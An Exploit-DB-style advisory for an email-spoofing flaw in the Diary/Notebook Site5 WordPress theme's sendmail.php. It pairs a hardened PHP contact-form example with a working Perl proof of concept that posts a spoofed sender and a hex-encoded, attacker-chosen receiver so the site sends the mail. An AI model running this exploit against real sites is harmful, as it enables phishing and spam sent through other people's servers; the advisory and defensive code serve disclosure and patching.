Vendor: Diary/Notebook Site5 Wordpress Theme
By: @bwallHatesTwits
CVSS: 7.5 (HIGH)
Vulnerability: Email Spoofing
CWE: 20
Product Name: Diary/Notebook Site5 Wordpress Theme
Affected Version From: Not Documented
Affected Version To: Not Documented
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux 3.2
2012

Diary/Notebook Site5 WordPress Theme – Email Spoofing

A vulnerability exists in the Diary/Notebook Site5 WordPress Theme which allows an attacker to send spoofed emails. It is due to the lack of proper validation of the sender's email address in the sendmail.php script. An attacker can exploit it by sending a crafted POST request to sendmail.php with a spoofed email address as the sender; in the proof of concept below, the request also carries the receiver address, hex-encoded, alongside the name, email and comment fields. This can be used to send malicious emails to unsuspecting users.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the Diary/Notebook Site5 WordPress Theme.
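
One way a contact-form handler can close this class of bug, as an added example (it is not Site5's patch or the theme's own code): the recipient is fixed server-side, the sender address is validated and used only as Reply-To, and CR/LF is rejected in header-bound fields. The constants, the function name and the sample submissions are assumptions; the field names come from the PoC request below.

```php
<?php
// Added example: hardened contact-form handling; not Site5's code or patch.
// Assumption: field names (name, email, comment, receiver) are those in the PoC request.
const CONTACT_RECIPIENT = 'owner@example.org';      // placeholder, fixed server-side
const SITE_FROM         = 'wordpress@example.org';  // placeholder, the site's own sender

// Returns [to, subject, body, headers] for mail(), or null if the submission is rejected.
function build_contact_mail(array $post): ?array
{
    foreach (['name', 'email', 'comment'] as $field) {
        if (!isset($post[$field]) || !is_string($post[$field])) {
            return null;
        }
    }
    $name    = trim($post['name']);
    $email   = trim($post['email']);
    $comment = trim($post['comment']);

    // Values that reach a header (subject, Reply-To) must not carry CR or LF.
    if (preg_match('/[\r\n]/', $name . $email)) {
        return null;
    }
    if ($name === '' || strlen($name) > 100 || $comment === ''
        || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // $post['receiver'] is never read: the recipient is a server-side constant.
    // The visitor's address goes in Reply-To; From stays on the site's own domain.
    $headers = ['From' => SITE_FROM, 'Reply-To' => $email];
    return [CONTACT_RECIPIENT, "Website contact message from $name", $comment, $headers];
}

// Constructed sample submissions; the second has the shape of the PoC request.
$samples = [
    ['name' => 'Alice', 'email' => 'alice@example.com', 'comment' => 'Hello'],
    ['name' => 'Proof of Concept', 'email' => 'sender@mail.com', 'comment' => 'Email content',
     'receiver' => bin2hex('receiver@mail.com'), 'submit' => 'submit'],
    ['name' => "x\r\nBcc: other@example.com", 'email' => 'a@example.com', 'comment' => 'hi'],
];
foreach ($samples as $i => $post) {
    $mail = build_contact_mail($post);
    echo $i, ': ', $mail === null ? 'rejected' : "accepted, to {$mail[0]}", PHP_EOL;
    // A real handler would call mail(...$mail) here when $mail is not null.
}
```

With this handling, the PoC-shaped submission is still delivered, but only to the fixed recipient and with the site's own From address, so the client-supplied receiver has no effect.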

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: Diary/Notebook Site5 Wordpress Theme - Email Spoofing
# Date: 15.07.2012
# Exploit Author: @bwallHatesTwits
# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)
# Software Link: http://www.wpdiarytheme.com/
# Vendor Homepage: http://www.site5.com/
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
# Version: Not Documented
# Tested on: Linux 3.2 
use strict;
use warnings;

use LWP::UserAgent; 
use HTTP::Request::Common qw{ POST };

#Change this to the root of the Wordpress
my $wordpress = 'http://localhost/wordpress/';
my $url = $wordpress.'wp-content/themes/diary/sendmail.php';

#Name shows up in the subject of the email (Website contact message from name)
my $name ='Proof of Concept';

#Sender email address
my $email = 'sender@mail.com';

#Content of the email
my $comment = 'Email content';

#Receiver email address
my $receiver = 'receiver@mail.com';
#Hex-encode the receiver, two hex digits per character, before it is sent
$receiver =~ s/(.)/sprintf("%x",ord($1))/eg;

my $ua = LWP::UserAgent->new();
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
print "Sending request to $url\n";
my $content = $ua->request($request)->as_string();
print $content;
print "\nDone\nFollow \@BallastSec on Twitter\n";